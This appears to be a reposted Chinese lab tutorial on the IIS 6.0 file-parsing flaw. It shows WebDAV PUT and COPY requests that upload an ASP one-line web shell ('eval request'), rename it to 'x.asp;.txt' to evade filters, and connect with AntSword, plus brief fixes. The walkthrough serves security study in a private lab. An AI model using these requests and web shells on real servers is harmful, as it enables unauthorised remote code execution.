0


IIS6.0文件解析漏洞

一、相关知识

1、IIS6.0解析漏洞介绍

(1)当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当做asp文件解析。

(2)当文件*.asp:1.jpg IIS6.0同样会将文件当做asp文件解析。

2、IIS6.0PUT上传原理

WebDAV基于HTTP1.1协议的通信是的HTTP支持PUT、MOVE、COPY、DELETE方法。

(1)探测是否存在IIS漏洞:

OPTIONS / HTTP1.1
Host:www.xxx.com

(2)上传txt文本文件

PUT /文件名.后缀名 HTTP1.1
Host:www.xxx.com
Content-Length:30
<%eval request(“chopper”)%>

(3)通过MOVE或COPY重名

COPY /文件名.后缀名 HTTP1.1
Host:www.xxx.com
Destination:http://www.xxx.com/重命名的文件名.后缀名;.后缀名

(4)删除

DELETE /文件名.后缀名 HTTP1.1
Host:www.xxx.com

3、IIS6.0解析文件类型

IIS6.0默认的可执行文件为:.asp、.asa、.cer、.cdx

4、IIS6.0文件解析漏洞修复方案

(1)目前尚无微软官方的补丁,可以通过自己编写的正则阻止XX.asp;.jpg类型的文件名。

(2)做好权限设置,限制用户创建文件夹

二、环境配置

攻击机:kaliIP:192.168.2.2靶机:Windows2008IP:192.168.2.130:8058

三、文件上传

1、设置代理

(1)浏览器设置代理

(2)Burpsuite设置代理

2、靶机环境配置

(1)设置写入权限

(2)设置WebDAV为允许

3、截取数据包

4、探测漏洞

5、创建文件,并写入一句话木马

木马:<%eval request("cmd")%>

6、复制文件并重命名,绕过拦截

四、蚁剑连接

连接目标URL:192.168.2.130:8058/123.asp;.txt 密码:cmd


本文转载自: https://blog.csdn.net/longlangci/article/details/124716254
版权归原作者 liebe1*1 所有, 如有侵权,请联系我们删除。

“IIS6.0文件解析漏洞”的评论:

还没有评论